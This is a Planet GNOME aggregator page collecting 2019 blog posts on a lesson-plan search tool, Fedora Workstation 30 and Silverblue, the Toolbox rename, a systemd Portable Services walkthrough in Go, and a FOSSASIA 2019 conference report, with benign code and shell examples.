Planet GNOME
http://planet.gnome.org/

Sam Thursfield: The Lesson Planalyzer

Fri, 05/04/2019 - 5:23pm

I’ve now been working as a teacher for 8 months. There are a lot of things I like about the job. One thing I like is that every day brings a new deadline. That sounds bad right? It’s not: one day I prepare a class, the next day I deliver the class one or more times and I get instant feedback on it right there and then from the students. I’ve seen enough of the software industry, and the music industry, to know that such a quick feedback loop is a real privilege!

Creating a lesson plan can be a slow and sometimes frustrating process, but the more plans I write the more I can draw on things I’ve done before. I’ve planned and delivered over 175 different lessons already. It’s sometimes hard to know if I’m repeating myself or not, or if I could be reusing an activity from a past lesson, so I’ve been looking for easy ways to look back at all my old lesson plans.

Search

GNOME’s Tracker search engine provides a good starting point for searching a set of lesson plans: I can put the plans in my ~/Documents folder, open the folder in Nautilus, and then type a term like "present perfect" into the search bar.

The results aren’t as helpful as they could be, though. I can only see a short snippet of the text in each document, when I really need to see the whole paragraph for the result to be directly useful. Also, the search returns anything where the words present and perfect appear, so we could be talking about tenses, or birthdays, or presentation skills.  I wanted a better approach.

Reading .docx files

My lesson plans have a fairly regular structure. An all-purpose search tool doesn’t know anything about my personal approach to writing lesson plans, though. I decided to try writing my own tool to extract more structured information from the documents. The plans are in .docx format1 which is remarkably easy to parse — you just need Python’s ‘zipfile’ and ‘xml’ modules, and some guesswork to figure out what the XML elements mean. I was surprised not to find a Python library that already did this for me, but in the end I wrote a very basic .docx helper module, and I used this to create a tool that reads my existing lesson plans and dumps the data as a JSON document.
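
As a minimal sketch of that approach, using only the standard library and the usual WordprocessingML element names (the real helper module handles more cases than this):

import zipfile
import xml.etree.ElementTree as ET

# WordprocessingML namespace used inside word/document.xml.
W = '{http://schemas.openxmlformats.org/wordprocessingml/2006/main}'

def docx_paragraphs(path):
    """Yield the plain text of each paragraph in a .docx file."""
    with zipfile.ZipFile(path) as docx:
        root = ET.fromstring(docx.read('word/document.xml'))
    for para in root.iter(W + 'p'):
        # A paragraph (<w:p>) contains runs (<w:r>) holding text (<w:t>).
        text = ''.join(node.text or '' for node in para.iter(W + 't'))
        if text:
            yield text

for paragraph in docx_paragraphs('lesson-plan.docx'):
    print(paragraph)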

It works reliably! In a few cases I chose to update documents rather than add code to the tool to deal with formatting inconsistencies. Also, the tool currently throws away all formatting information, but I barely notice.

Web and desktop apps

From there, of course, things got out of control and I started writing a simple web application to display and search the lesson plans. Two months of sporadic effort later, and I just made a prototype release of The Lesson Planalyzer. It remains to be seen how useful it is for anyone, including me, but it’s very satisfying to have gone from an idea to a prototype application in such a short time. Here’s an ugly screenshot, which displays a couple of example lesson plans that I found online.

The user interface is HTML5, made using Bootstrap and a couple of other cool JavaScript libraries (which I might mention in a separate blog post). I’ve wrapped that up in a basic GTK application, which runs a tiny HTTP server and uses a WebKitWebView to display its output. The desktop application has a couple of features that can’t be implemented inside a browser: one is the ability to open plan documents directly in LibreOffice, and the other is a dedicated entry in the alt+tab menu.
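
The wrapper part is conceptually tiny. Here is a purely illustrative Python sketch of that pattern (the actual application may be structured differently, and the port number is made up):

import gi
gi.require_version('Gtk', '3.0')
gi.require_version('WebKit2', '4.0')
from gi.repository import Gtk, WebKit2

# A plain GTK window hosting a WebKitWebView pointed at a local HTTP server.
window = Gtk.Window(title='Lesson Planalyzer')
view = WebKit2.WebView()
view.load_uri('http://127.0.0.1:8000/')  # hypothetical local server address
window.add(view)
window.connect('destroy', Gtk.main_quit)
window.show_all()
Gtk.main()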

If you’re curious, you can see the source at https://gitlab.com/samthursfield/planalyzer/. Let me know if you think it might be useful for you!

1. I need to be able to print the documents on computers which don’t have LibreOffice available, so they are all in .docx format.

Christian Schaller: Preparing for Fedora Workstation 30

Wed, 03/04/2019 - 9:20pm

I just installed the Fedora Workstation 30 Beta yesterday and so far things are looking great. As many others have reported too, with the GNOME 3.32 update things definitely feel faster and smoother. So I thought it was a good time to talk about what is coming in Fedora Workstation 30 and what we are currently working on.

Fractional Scaling: One of the big features that landed, although still considered experimental, is fractional scaling, which has been a collaboration between Jonas Ådahl here at Red Hat and Marco Trevisan at Canonical. It has taken quite some time since the initial hackfest as it is a complex task, but we are getting close. Fractional scaling is a critical feature for many HiDPI screen laptops to get a desktop size that perfectly fits their screen, being neither too small nor too large.

Screen sharing support for Chrome and Firefox under Wayland. The Wayland security model doesn’t allow any application to freely grab images or streams of the whole desktop like you could under X. This is of course a huge improvement in security, but it did cause some disruption for valid use cases like screen sharing with things like BlueJeans and Google Hangouts. We have been working on resolving that with the help of PipeWire. We have been at it for some time and things are now coming together. Chrome 73 ships with everything needed to make this work, although you have to turn it on manually (go to this URL to turn it on: chrome://flags/#enable-webrtc-pipewire-capturer). The reason it needs to be manually enabled is not that it is unreliable; it is because the UI is still a little fugly due to a combination of feature overlap between the browser and the desktop and also how the security feature of the desktop is done. We are trying to come up with ways for the UI to be smoother without sacrificing your privacy/security. For Firefox we will keep shipping with our downstream patch until we manage to get it landed upstream.

Firefox for Wayland: Martin Stransky has been hard at work making Firefox able to run natively on Wayland. That work is tantalizingly near, but in the end we decided to postpone it to Fedora Workstation 31 to make sure it is really well polished before releasing it upon the world. The advantage of Wayland-native Firefox is that, in addition to bringing us one step closer to not needing to run an X server (XWayland) all the time, it also enables things like the fractional scaling mentioned above to work for Firefox.

OpenH264 improved: As many of you know, Firefox relies on a library called OpenH264, provided by Cisco, for its H264 video codec support for WebRTC. This library is also provided to Fedora users from Cisco free of charge (you can install it through GNOME Software). However, its usefulness has been somewhat limited due to only supporting the baseline profile used for video calling, but not the Main and High profiles used by most online video content. Well, what I can tell you is that Red Hat, Endless and Cisco partnered with Centricular some time ago to add support for decoding those profiles to OpenH264, and that work is now almost complete. The basic code enabling them is already merged, but Jan Schmidt at Centricular is working on fixing a few files that are still giving us problems. As soon as that is generally shipping we hope to get Firefox to be able to use OpenH264 for things like YouTube playback and of course also use OpenH264 to play back H264 in GStreamer applications like Totem. So a big thank you to Endless, Cisco and Centricular for working with us on this and thus enabling us to have a legal way to offer H264 support to our users.

NVidia binary driver support under Wayland: We have been putting quite a bit of effort into tying off the loose ends for using the NVidia binary driver with Wayland. We did manage to fix a long list of bugs, dealing with various colorspace issues, multi-monitor setups and so on. For Intel and AMD graphics users things should actually be pretty good to go at this point. The last major item holding us back on the NVidia side is full support for using the binary driver with XWayland applications (native Wayland applications should work fine already). Adam Jackson worked diligently to get all the pieces in place and we do think we have a model now that will allow NVidia to provide an updated driver that should enable XWayland. As it stands though, that driver update is likely to only come out towards the fall, so we will keep defaulting to X for NVidia binary driver users for some time more.

Gaming under Wayland. Olivier Fourdan and Jonas Ådahl have been trying to crush any major Wayland bug reported for quite some time now, and one area where we seem to have turned the corner is games. Valve has been kind enough to give us the ability to install and run any Steam game for testing purposes, so whenever we found a game giving us trouble we have been able to let Olivier and Jonas reproduce it easily. So on my own gaming box I am now able to run all the Steam games I have under Wayland, including those using Proton, without a hitch. We haven’t tested the full Steam catalog of course (there are thousands), so if your favourite game is still giving you trouble under Wayland, please let us know. Talking about gaming, one area we will try to free up some cycles for going forward is Flatpaks and gaming. We have already done quite a bit of work in this area, with things like the NVidia binary driver extension and the Steam package on Flathub. But we know from leading Linux game devs that there are still some challenges to be resolved, like making host device access for gamepads simpler from within the Flatpak sandbox.

Flatpak Creation in Fedora. Owen Taylor has been in charge of getting Flatpaks building in Fedora, ensuring we can produce Flatpaks from Fedora packages. Owen set up a system to track the Fedora Flatpak status; we have about 10 applications so far, but hope to greatly grow that number over time as we polish up the system. This enables us to start planning for shipping some applications in Fedora Workstation as Flatpaks by default in a future release. This repository will be available by default in Fedora Workstation 30 and you can choose the Flatpak version of a package through the new drop-down box in the top right corner of GNOME Software. For now the RPM version of the package is still the default, but we expect to change that in later releases of Fedora Workstation.

Gedit in GNOME Software with the Source drop-down box

Fedora Toolbox – Debarshi Ray is leading the effort we call Fedora Toolbox, which is our starting point for our goal to revitalise and revolutionize development on Linux. Fedora Toolbox is trying to take the model of a pet container for development and make it seamless and natural. Our goal is to make it dead simple to create pet containers for your projects, so you can for instance have a Fedora pet container where you develop against the leading edge libraries and tools in Fedora, and you can have a RHEL based container where you develop against the library versions and tools shipping in RHEL (which makes updating and fixing applications in production a lot easier), and maybe a SteamOS container to work on your little game project. Currently the model is that you have one pet container per OS you’re targeting, but we are pondering whether having one pet container per project would be even better, if we can find good ways to avoid it adding a lot of extra overhead (for example having to re-install all your favourite command line tools in every container) or just being outright confusing (which container had what tools and libraries again?). Our goal here though is to ensure Fedora becomes the premier container-native OS out there and thus a natural home for developers doing container development.
We are also working with the team inside Red Hat focusing on AI/ML and trying to ensure that we have a super smooth way for you to get a pet container with things like TensorFlow and CUDA up and running quickly.

Being an excellent platform for OpenShift and Kubernetes development: Together with the Red Hat developer tools organization, we are putting effort into bringing the OpenShift, CodeReady Studio and CodeReady Workspaces tools to Fedora. These tools have so far been very focused on RHEL support, but thanks to Flatpak for CodeReady Studio and web integration for CodeReady Workspaces we now have a path for making them easily available in Fedora too. In the world of Kubernetes, OpenShift is where you want to be, and we want Fedora Workstation to be the ultimate portal for OpenShift development.

Fleet Commander with Active Directory support – We are about to hit a very major milestone with Fleet Commander, our large-scale desktop management tool for Fedora and RHEL. Oliver Gutierrez has been hard at work making it work with Active Directory in addition to the existing FreeIPA support. We know that a majority of people interested in Fleet Commander are only using Active Directory currently, so being able to use Active Directory with Fleet Commander should make this great tool available to a huge number of new users. So if you are managing a university computer lab or a large number of Fedora or RHEL clients in your company, we should soon have a Fleet Commander release out that you can use. And if you are not using Fedora or RHEL today, well, Fleet Commander is a very big reason for switching over!
We will do a proper announcement with further details once the release with Active Directory support is out.

PipeWire – I don’t have a major development to report, just a lot of steady work being done to stabilize and improve PipeWire. As mentioned earlier, we now have Wayland screen sharing and recording working smoothly in the major browsers, which is the user-facing feature I think most of you will notice. Wim is still working on pushing the audio side of it forward, but that is also a huge task. We have started talking about organizing a new hackfest soon to see if we can accelerate the effort further. The likely scenario at this point in time is that we start enabling the JACK side of PipeWire first, maybe as early as Fedora Workstation 31, and then come back and do the PulseAudio replacement as a last stage.

Improved Input handling: Another area we keep focusing on is improving input in Fedora. Peter Hutterer and Benjamin Tissoires are working hard on improving the stack. Peter just sent out an extensive RFC on how to deal with high resolution mice under Linux, and Benjamin has been trying to get support for the Dell Totem landed. Unfortunately neither will be there for Fedora Workstation 30, but we expect to land both before Fedora Workstation 31.

Flicker-free boot
Hans de Goede has continued working on his effort to create a flicker-free boot experience for Fedora. The results of this work are on display in Fedora Workstation 30 and will, for most of you, now provide a seamless bootup experience. This effort is not so much about functionality as it is about ensuring you have an end-to-end polished experience with your Linux desktop. Things like the constant mode changes we have seen in the past contribute to giving Linux an image of being unpolished, and we want Fedora to be the vehicle that breaks down that image.

Ramping up Silverblue

For those of you following Fedora you are probably aware of Silverblue, which is our effort to re-think the Linux desktop distribution from the ground up and help us take the Linux desktop to a new level. The distribution model hasn’t really changed much over the last 20 years and we have probably polished up the offering as far as we can within the scope of that model. For instance, I upgraded my system to Fedora 30 beta yesterday and it was a long and tedious process of watching about 6000 individual packages get updated from the Fedora 29 version to the Fedora 30 version one by one. I didn’t hit a lot of major snags despite this being a beta, but it is screamingly obvious that updating your operating system in this way is both slow and inherently fragile, as any one of those 6000 packages might hit a problem during the upgrade and leave the system in an unknown state, especially since it’s common for packages to run scripts and similar as part of their upgrade.

Silverblue provides a revolutionary replacement for that process. First of all, since it ships as a unified image, we make life a lot easier for our QE team, who can test and verify against a single image in a known state. This in turn ensures that you as a user can feel confident that the new OS version will not break something on your system. And since the new version is just an image stored on your system next to the old one, upgrading is just a matter of rebooting your system. There is no waiting for individual packages to get upgraded, as everything is already there and ready. Compare it to booting into a different kernel version on Fedora: it is quick and trivial.
And this also means that in the unlikely case that there is a problem with the new OS version you can just as easily go back to the previous version, by rebooting again and choosing to boot into that version. So you basically have instant upgrades with instant rollback if needed.
We believe this will radically change the way you look at OS upgrades forever, in fact you might almost forget they are happening.
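
A rough sketch of that flow with rpm-ostree's standard commands (the graphical flow goes through GNOME Software, but the mechanism is the same):

# stage the new OS image next to the current deployment
$ rpm-ostree upgrade
# reboot into the new image
$ systemctl reboot
# if something went wrong, boot back into the previous deployment
$ rpm-ostree rollback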

And since Silverblue will basically be a Flatpak (and other containers) only OS, you will have a clean delimitation between OS and applications. This means that even if we do major updates to the host, your applications should remain unaffected by the host OS update.
In fact we have some very interesting developments underway for Flatpak, efforts that I would love to talk about, but they are tied to some major Red Hat announcements that will happen at this year’s Red Hat Summit, which takes place May 7th – May 9th, so I will leave it as a teaser and let you all know once the Summit is underway and Red Hat’s related major announcements are done.

There is a lot of work happening around Silverblue, and as it happens Matthias Clasen wrote a long blog entry about it today. That blog post goes into a lot more detail on some of the Silverblue work items we have been doing.

Anyway, I feel really excited about Silverblue, and as we continue to refine the experience and figure out how everything will look in this brave new world, I am sure everyone else will get excited too. Silverblue represents the single biggest evolution of the Linux desktop since the original GNOME and KDE releases back in the late nineties. It is not just about trying to tweak the existing experience, but an attempt at taking a big leap forward and providing an operating system that embodies all that we have learned over these last 20 years and provides a natural home for developers and creators of all kinds in our container-centric computing future. Be sure to grab the Silverblue image of Fedora 30 beta and give it a test run. I recommend activating the flathub.org repo to get started, in order to get a decent range of applications available. As we move forward we are working hard to ensure that you have the world of applications available out of the box, so there will be no need to go and enable any 3rd party repositories, but there is some more work that needs to happen before we can do that.

Summary
So Fedora Workstation 30 is going to be another exciting release, both of the traditional RPM-based Workstation version and of Silverblue, and I hope they will encourage even more people to join our rapidly growing Fedora community. Be sure to join us in #fedora-workstation on freenode IRC to talk!

Matthias Clasen: Silverblue at 1

Wed, 03/04/2019 - 8:07pm

It has been a bit more than a year since we set up the Atomic Workstation SIG. A little later, we settled on the name Silverblue, and did a preview release with Fedora 29.

The recent F30 beta release is a good opportunity to look back. What have we achieved?

When we set out to turn Atomic Workstation into an every-day-usable desktop, we had a list of items that we knew needed to be addressed. As it turns out, we have solved most of them, or are very close to that.

Here is an unsorted list.

Full Flatpak support

GNOME Software already had support for installing Flatpaks a year ago, so this is not 100% new. But the support has been greatly improved with the port to libflatpak – GNOME Software is now using the same code as the Flatpak command line. And more recently, it learned to display information about sandbox permissions, so that users can see what level of system access the installed applications have.

This information is now also available in the new Application Settings panel. The panel also offers some control over permissions and lets you clean up storage per application.

A Flatpak registry

Flathub is a great place to find desktop applications – there are over 500 now. But since we can’t enable Flathub by default, we have looked for an alternative, and started to provide Flatpak apps in the Fedora container registry. This takes advantage of Flatpak’s support for the OCI format, and uses the Fedora module-build-system.

GNOME Software support for rpm-ostree

GNOME Software was designed as an application installer, but it also provides the UI for OS updates and upgrades. On a Silverblue system, that means supporting rpm-ostree. GNOME Software has learned to do this.

Another bit of functionality for which GNOME Software was traditionally talking to PackageKit is Addons. These are things that could be classified as system extensions: fonts, language support, shell extensions, etc. On a Silverblue system, the direct replacement is to use the rpm-ostree layering capability to add such packages to the OS image. GNOME Software knows how to do this now. It is not ideal, since you probably don’t expect to have to reboot your system to install a font. But it gets us the basic functionality back until we have better solutions for system extensions.
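
Under the hood this is plain package layering; the command-line equivalent of what GNOME Software does here would be something like the following (the package name is just an example):

# layer a font package on top of the immutable OS image;
# it becomes active after the next reboot
$ rpm-ostree install google-roboto-fonts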

Nvidia driver support

One class of system extensions that I haven’t mentioned in the previous section is drivers. If you have an Nvidia graphics card, you may want the Nvidia driver to make best use of your hardware. The situation with the Nvidia drivers is a little more complicated than with plain rpms, since the rpm needs to match your kernel, and if you don’t have the right driver, your system may boot to a black screen.

These complications are not unique to Silverblue, and the traditional solution for this in Fedora is to use the akmod system to build drivers that match your kernel. With Fedora 30, we put the necessary changes in place in rpm-ostree and the OS image to make this work for Silverblue as well.

Third-party rpms

Fedora contains a lot of apps, but there’s always the odd one that you can’t find in the repositories. A popular app in this category is the Chrome browser. Thankfully, Google provides an rpm that works on Fedora. But it installs its content into /opt. That is not technically wrong, but it causes a problem on Silverblue, since rpm-ostree has so far insisted on keeping packaged content under its tight control in /usr.

Ultimately, we want to see apps shipped as Flatpaks, but for Fedora 30, we have managed to get rpm-ostree to handle this situation, so Chrome and similar third-party rpms can now be installed via package layering on Silverblue.

A toolbox

An important target audience for Fedora Workstation is developers. Not being able to install toolchains and libraries (because the OS is immutable) is obviously not going to make this audience happy.

The short answer is: switch to container-based workflows. It’s the future!

But that doesn’t excuse us from making these workflows easy and convenient for people who are used to the power of the command line. So we had to come up with a better answer, and started to develop the toolbox. The toolbox is a command-line tool that takes the pain out of working with ‘pet’ containers. With a single command,

toolbox enter

it gives you a ‘traditional’ Fedora environment with dnf, where you can install the packages you need. The toolbox has the infrastructure to manage multiple named containers, so you can work on different projects in parallel without interference.
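
A rough sketch of that workflow (the exact flag names have varied between toolbox releases):

$ toolbox create --container project-a   # create a named pet container
$ toolbox enter --container project-a    # a Fedora shell with dnf inside
$ sudo dnf install gcc make              # installs into the container only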

What’s missing?

There are many bigger and smaller things that can still be improved – software is never finished. To name just a few:

  • Make IDEs work well with containers on an immutable OS
  • Codec availability and installation
  • Handle “difficult” applications such as VirtualBox well
  • Find better ways to handle system extensions

But we’ve come a long way in the one year since I’ve started using Atomic Workstation as my day-to-day OS.

If you want to see for yourself, download the F30 beta image and give it a try!

Debarshi Ray: Fedora Toolbox is now just Toolbox

Wed, 03/04/2019 - 7:52pm

Fedora Toolbox has been renamed to just Toolbox. Even though the project is obviously driven by the needs of Fedora Silverblue, and uses technologies like Buildah and Podman that are driven by members of the wider Fedora project, it was felt that a toolbox container is a generic concept that appeals to many more communities than just Fedora. You can also think of it as a nod to coreos/toolbox, which served as the original inspiration for the project, and there are plans to use it in Fedora CoreOS too.

If you’re curious, here’s a subset of the discussion that drove the renaming.

There have already been two releases with the new name, so I assume that almost all users have been migrated.

Note that the name of the base OCI image for creating Fedora toolbox containers is still fedora-toolbox for obvious namespacing reasons, but the names of the client-side command line tool and the overall project itself have changed. That way you could have a debian-toolbox, a centos-toolbox and so on.

It should be obvious, but the Toolbox logo was designed and created by Jakub Steiner.

Lennart Poettering: Walkthrough for Portable Services in Go

Wed, 03/04/2019 - 7:36pm
Portable Services Walkthrough (Go Edition)

A few months ago I posted a blog story with a walkthrough of systemd Portable Services. The example service given was written in C, and the image was built with mkosi. In this blog story I'd like to revisit the exercise, but this time focus on a different aspect: modern programming languages like Go and Rust push users a lot more towards static linking of libraries than the usual dynamic linking preferred by C (at least in the way C is used by traditional Linux distributions).

Static linking means we can greatly simplify image building: if we don't have to link against shared libraries during runtime we don't have to include them in the portable service image. And that means pretty much all need for building an image from a Linux distribution of some kind goes away as we'll have next to no dependencies that would require us to rely on a distribution package manager or distribution packages. In fact, as it turns out, we only need as few as three files in the portable service image to be fully functional.

So, let's have a closer look how such an image can be put together. All of the following is available in this git repository.

A Simple Go Service

Let's start with a simple Go service, an HTTP service that simply counts how often a page from it is requested. Here are the sources: main.go — note that I am not a seasoned Go programmer, hence please be gracious.

The service implements systemd's socket activation protocol, and thus can receive bound TCP listener sockets from systemd, using the $LISTEN_PID and $LISTEN_FDS environment variables.
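
The protocol itself is tiny. Here is a minimal sketch of the receiving side in Go, assuming a single passed socket (the real main.go may differ):

package main

import (
	"fmt"
	"net"
	"net/http"
	"os"
	"strconv"
)

// activationListener turns the first socket passed by systemd into a
// net.Listener. systemd sets $LISTEN_PID to our PID and $LISTEN_FDS to
// the number of inherited sockets, which start at file descriptor 3.
func activationListener() (net.Listener, error) {
	if pid, err := strconv.Atoi(os.Getenv("LISTEN_PID")); err != nil || pid != os.Getpid() {
		return nil, fmt.Errorf("not socket activated")
	}
	if n, err := strconv.Atoi(os.Getenv("LISTEN_FDS")); err != nil || n < 1 {
		return nil, fmt.Errorf("no sockets passed")
	}
	return net.FileListener(os.NewFile(3, "listen-fd-3"))
}

func main() {
	listener, err := activationListener()
	if err != nil {
		panic(err)
	}
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "Hello!")
	})
	http.Serve(listener, nil)
}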

The service will store the counter data in the directory indicated in the $STATE_DIRECTORY environment variable, which happens to be an environment variable current systemd versions set based on the StateDirectory= setting in service files.

Two Simple Unit Files

When a service shall be managed by systemd a unit file is required. Since the service we are putting together shall be socket activatable, we even have two: portable-walkthrough-go.service (the description of the service binary itself) and portable-walkthrough-go.socket (the description of the sockets to listen on for the service).

These units are not particularly remarkable: the .service file primarily contains the command line to invoke and a StateDirectory= setting to make sure the service when invoked gets its own private state directory under /var/lib/ (and the $STATE_DIRECTORY environment variable is set to the resulting path). The .socket file simply lists 8080 as TCP/IP port to listen on.
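
For reference, the essential content of such units might look like this (a sketch; the real files are in the repository linked above):

# portable-walkthrough-go.service
[Unit]
Description=A simple Go HTTP service

[Service]
ExecStart=/usr/bin/portable-walkthrough-go
StateDirectory=portable-walkthrough-go

# portable-walkthrough-go.socket
[Unit]
Description=Listening socket for the Go HTTP service

[Socket]
ListenStream=8080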

An OS Description File

OS images (and that includes portable service images) generally should include an os-release file. Usually, that is provided by the distribution. Since we are building an image without any distribution let's write our own version of such a file. Later on we can use the portablectl inspect command to have a look at this metadata of our image.

Putting it All Together

The four files described above are all we need to build our image. Let's now put the portable service image together. For that I've written a Makefile. It contains two relevant rules, sketched after the list below: the first one builds the static binary from the Go program sources. The second one then puts together a squashfs file system combining the following:

  1. The compiled, statically linked service binary
  2. The two systemd unit files
  3. The os-release file
  4. A couple of empty directories such as /proc/, /sys/, /dev/ and so on that need to be over-mounted with the respective kernel API file system. We need to create them as empty directories here since Linux insists on directories to exist in order to over-mount them, and since the image we are building is going to be an immutable read-only image (squashfs) these directories cannot be created dynamically when the portable image is mounted.
  5. Two empty files /etc/resolv.conf and /etc/machine-id that can be over-mounted with the same files from the host.
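
A condensed sketch of those two Makefile rules (paths and flags are illustrative, not necessarily identical to the repository's Makefile):

portable-walkthrough-go: main.go
	# build a fully static binary so no shared libraries are needed
	CGO_ENABLED=0 go build -o $@ main.go

portable-walkthrough-go.raw: portable-walkthrough-go
	rm -rf rootfs
	mkdir -p rootfs/usr/bin rootfs/usr/lib/systemd/system rootfs/etc \
		rootfs/proc rootfs/sys rootfs/dev rootfs/run rootfs/tmp rootfs/var
	cp portable-walkthrough-go rootfs/usr/bin/
	cp portable-walkthrough-go.service portable-walkthrough-go.socket \
		rootfs/usr/lib/systemd/system/
	cp os-release rootfs/usr/lib/os-release
	touch rootfs/etc/resolv.conf rootfs/etc/machine-id
	# pack the tree into an immutable squashfs image
	mksquashfs rootfs $@ -noappend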

And that's already it. After a quick make we'll have our portable service image portable-walkthrough-go.raw and are ready to go.

Trying it out

Let's now attach the portable service image to our host system:

# portablectl attach ./portable-walkthrough-go.raw
(Matching unit files with prefix 'portable-walkthrough-go'.)
Created directory /etc/systemd/system.attached.
Created directory /etc/systemd/system.attached/portable-walkthrough-go.socket.d.
Written /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf.
Copied /etc/systemd/system.attached/portable-walkthrough-go.socket.
Created directory /etc/systemd/system.attached/portable-walkthrough-go.service.d.
Written /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf.
Created symlink /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf → /usr/lib/systemd/portable/profile/default/service.conf.
Copied /etc/systemd/system.attached/portable-walkthrough-go.service.
Created symlink /etc/portables/portable-walkthrough-go.raw → /home/lennart/projects/portable-walkthrough-go/portable-walkthrough-go.raw.

The portable service image is now attached to the host, which means we can now go and start it (or even enable it):

# systemctl start portable-walkthrough-go.socket

Let's see if our little web service works, by doing an HTTP request on port 8080:

# curl localhost:8080
Hello! You are visitor #1!

Let's try this again, to check if it counts correctly:

# curl localhost:8080
Hello! You are visitor #2!

Nice! It worked. Let's now stop the service again, and detach the image again:

# systemctl stop portable-walkthrough-go.service portable-walkthrough-go.socket
# portablectl detach portable-walkthrough-go
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/10-profile.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d/20-portable.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.service.d.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d/20-portable.conf.
Removed /etc/systemd/system.attached/portable-walkthrough-go.socket.d.
Removed /etc/portables/portable-walkthrough-go.raw.
Removed /etc/systemd/system.attached.

And there we go, the portable image file is detached from the host again.

A Couple of Notes
  1. Of course, this is a simplistic example: in real life services will be more than one compiled file, even when statically linked. But you get the idea, and it's very easy to extend the example above to include any additional, auxiliary files in the portable service image.

  2. The service is very nicely sandboxed during runtime: while it runs as regular service on the host (and you thus can watch its logs or do resource management on it like you would do for all other systemd services), it runs in a very restricted environment under a dynamically assigned UID that ceases to exist when the service is stopped again.

  3. Originally I wanted to make the service not only socket activatable but also implement exit-on-idle, i.e. add logic so that the service terminates on its own when there's no ongoing HTTP connection for a while. I couldn't figure out how to do this race-freely in Go though, but I am sure an interested reader might want to add that? By combining socket activation with exit-on-idle we can turn this project into an exercise in putting together an extremely resource-friendly and robust service architecture: the service is started only when needed and terminates when no longer needed. This would allow packing services at a much higher density even on systems with few resources.

  4. While the basic concepts of portable services have been around since systemd 239, it's best to try the above with systemd 241 or newer since the portable service logic received a number of fixes since then.

Further Reading

A low-level document introducing Portable Services is shipped along with systemd.

Please have a look at the blog story from a few months ago that did something very similar with a service written in C.

There are also relevant manual pages: portablectl(1) and systemd-portabled(8).

Tristan Van Berkom: FOSSASIA 2019 Report

Wed, 03/04/2019 - 12:36pm

Hi,

This post is a broad summary of my experience at FOSSASIA this year in Singapore.

Singapore

This was my first visit to Singapore, and I think it is a very nice and interesting place. The city is very clean (sometimes disturbingly so), the food I encountered was mostly Chinese and Indian, and while selling food out of carts on the street was outlawed some time ago, there is thankfully still a strong culture of street food available in the various “Hawker Centres” (food courts) where the previous street vendors have taken up shop instead.

From my very limited experience there, I would have to recommend roaming around the China Town food street and enjoying beer and food (be warned, beer in Singapore is astoundingly expensive!)… Here is a picture of what it looks like.

Many of us ate food here on Friday night

Since the majority of people living in Singapore can speak English, I think this is a great place for a westerner to enjoy their first taste of the Asian experience, without being too disoriented.

The Presentations

The conference took place in the Lifelong Learning Institute this year, and aside from its obvious focus on FOSS, it has a strong focus on education and open hardware. There are many students who attend the conference, many of whom participated in an exciting hackathon.

There were a lot of talks, so I’ll just summarize some of the talks which I attended and found particularly memorable.

Open Science, Open Mind

In the opening sessions, Lim Tit Meng, who was responsible for hosting FOSSASIA in previous years at Science Centre Singapore, gave an inspirational talk which I thought was quite moving. To quote from the summary of his talk:

Scientific information, discoveries, and inventions should be treated as an open source to benefit as many people and sectors as possible.

There are many reasons for people to get involved in FOSS these days. The ideals of software freedom have been a strong driver; the desire to create software that is superior in quality compared to software developed in silos has been a strong driver for myself. What I took home from Lim Tit Meng’s talk is that FOSS also embodies the spirit of sharing knowledge simply for the good of humanity, that we shouldn’t limit this sharing only to software but that it should extend across all the sciences, and this is a very powerful idea.

Betrusted & the Case for Trusted I/O

Also on the first day, Bunnie Huang joined us to talk about his project Betrusted, an open hardware design comprised of a simple display, input device and FPGA. The idea is to have a hardware design which can be easily audited and validated for tampering, and which can be used to store your private matters separately from a complicated mobile device such as a hand phone or tablet.

I think Bunnie gave a very clear overview of the various attack surfaces we need to care about when considering modern personal computing devices.

The blockchain talks

I attended two talks with a focus on applications of blockchain technology, these were interesting to watch for people like me who don’t really have any deep understanding of blockchain (or crypto), but would like to have a higher level understanding of what kinds of applications we can use blockchain for.

First, Ong Khai Wei from IBM gave a talk entitled What would you build next with Blockchain?, where he shared some of the current applications of blockchain technology and introduced us to Hyperledger, a system for managing supply chains.

The other blockchain talk I attended was presented by Jollen Chen, presenting Flowchain, he talked mostly about how we can store and transfer data in a network of IoT devices using Flowchain and IPFS.

Open Source Quantum Computing

Matthew Treinish gave an interesting talk for people like me who know basically nothing about quantum computing. As someone who got interested in quantum computing purely as a hobby, I thought he was perfectly placed to explain things in terms that are simple enough to understand.

Open Source Hardware and Education

This report would be incomplete without a mention of Mitch Altman, a charismatic fellow with an enthusiasm for teaching and inspiring youth to get interested in making things work.

He also gave a workshop in the afternoons where he was teaching people to solder using a selection of kits with neat little lights and speakers.

Open Source Firmware

This was another interesting talk delivered by Daniel Maslowski and Philipp Deppenwiese, unfortunately I was not able to find a recording of this talk.

It included a history of open source firmware and Daniel’s story as an end user, and the hoops he needed to jump through in order to upgrade his proprietary firmware.

Finally there was a demo where Daniel successfully bricked a laptop for us using the manufacturer’s closed source BIOS updater, and upgraded the firmware on another laptop using Coreboot (I presume the bricked machine has come back to life by now).

My BuildStream Talk

Yes, I did attend my own talk, although I should say it is by far the worst presentation I have ever given.

The lesson to take home for me is: take the time to understand your target audience and adapt your talk to be more suitable for the audience. My biggest mistake here is that I had adapted material from previous presentations, but those previous presentations had a very technical audience; I could tell as soon as I started my presentation that the people in the room clearly had no idea what I was talking about (although I did ask for a show of hands in a couple of instances and stopped to explain some things which clearly needed explaining).

Instead of explaining how our tooling addresses various problems in existing tooling and how we aim to cleanly separate the “build” problem from the “deployment” problem – I really should have taken a step back and made a presentation about “Why people should care about how their software gets built and integrated” in general.

Closing Ceremonies

On the last day of the conference, we got to see the students who participated in the hackathon present the applications they developed.

The hackathon itself had some interesting guidelines. As UNESCO is one of the primary sponsors of the FOSSASIA event, it seemed fitting that the hackathon competition entries should be related to protecting endangered indigenous languages and culture, in observation of the Year of Indigenous Languages.

The result was truly splendid and this was probably my favorite part of the entire conference. You can watch the young coders presenting their projects here.

FOSSASIA 2019 Organizers and Volunteers

